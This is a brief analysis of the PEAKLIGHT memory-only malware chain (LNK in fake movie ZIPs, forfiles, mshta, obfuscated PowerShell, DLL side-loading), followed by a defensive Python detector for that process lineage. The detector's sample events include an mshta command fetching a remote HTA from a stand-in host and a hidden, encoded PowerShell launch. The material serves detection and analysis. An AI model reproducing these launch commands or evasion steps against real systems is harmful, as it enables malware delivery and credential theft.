Analysis of PEAKLIGHT, a complex memory-only malware that uses a multi-stage infection chain to evade detection. The attack starts with a malicious Microsoft Shortcut File (LNK) hidden in fake movie ZIP files. When executed, this file uses forfiles.exe and mshta.exe to run a heavily obfuscated PowerShell script, which downloads further payloads from a remote CDN. The script operates entirely in memory and uses custom decryption routines to handle encrypted payloads, protected by AES-CBC or AES-ECB and encoded in hexadecimal or Base64.
PEAKLIGHT further evades detection by employing DLL side-loading to execute infostealers such as Cryptbot and SHADOWLADDER, dynamically unpacking ZIP files and running their contents from hidden directories, while relying on legitimate Windows tools and trusted content delivery networks throughout.
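As an added illustration of how a defender might hunt for the launch chain described above (this is example code, not part of the original analysis): a Python sketch that parses constructed, simplified Sysmon-style process-creation records and flags any powershell.exe whose parent is mshta.exe and whose grandparent is forfiles.exe, noting whether mshta fetched a remote URL and whether PowerShell asked for a hidden window. The log format, PIDs, paths and URL are assumptions made for the sample.

```python
import re
# Constructed sample process-creation events (simplified Sysmon-like key=value
# form, not real telemetry): 4140 is the page's chain, 5010 a benign forfiles use.
SAMPLE_EVENTS = """\
pid=4012 ppid=3500 image=C:\\Windows\\explorer.exe cmd="explorer.exe"
pid=4100 ppid=4012 image=C:\\Windows\\System32\\forfiles.exe cmd="forfiles.exe /c ..."
pid=4120 ppid=4100 image=C:\\Windows\\System32\\mshta.exe cmd="mshta.exe https://cdn.example.invalid/loader.hta"
pid=4140 ppid=4120 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmd="powershell.exe -w hidden -enc ..."
pid=5000 ppid=4012 image=C:\\Windows\\System32\\forfiles.exe cmd="forfiles.exe /p C:\\logs /m *.log /c ..."
pid=5010 ppid=5000 image=C:\\Windows\\System32\\cmd.exe cmd="cmd.exe /c echo app.log"
"""
LINE_RE = re.compile(r'pid=(\d+) ppid=(\d+) image=(\S+) cmd="([^"]*)"')
SUSPECT_CHAIN = ("powershell.exe", "mshta.exe", "forfiles.exe")  # child first

def parse_events(text):
    """Return {pid: (ppid, lowercased image basename, command line)}."""
    events = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            pid, ppid, image, cmd = m.groups()
            events[int(pid)] = (int(ppid), image.rsplit("\\", 1)[-1].lower(), cmd)
    return events

def ancestry(events, pid):
    """Image names from the process up to its oldest ancestor present in the log."""
    chain, seen = [], set()
    while pid in events and pid not in seen:  # 'seen' guards against pid-reuse cycles
        seen.add(pid)
        ppid, image, _ = events[pid]
        chain.append(image)
        pid = ppid
    return chain

def find_peaklight_chains(text):
    """Flag direct forfiles -> mshta -> powershell lineages with remote-fetch and hidden-window indicators."""
    events = parse_events(text)
    hits = []
    for pid, (ppid, _, cmd) in events.items():
        lineage = ancestry(events, pid)
        if tuple(lineage[:3]) != SUSPECT_CHAIN:
            continue
        mshta_cmd, ps_cmd = events[ppid][2].lower(), cmd.lower()
        hits.append({
            "pid": pid, "chain": " -> ".join(reversed(lineage)),
            "remote_hta": "http://" in mshta_cmd or "https://" in mshta_cmd,
            "hidden_window": "-w hidden" in ps_cmd or "-windowstyle hidden" in ps_cmd,
        })
    return hits
```

Real detections should also key on the LNK origin (explorer.exe launching forfiles.exe from a user-writable path) rather than on process names alone, since each tool is legitimate on its own.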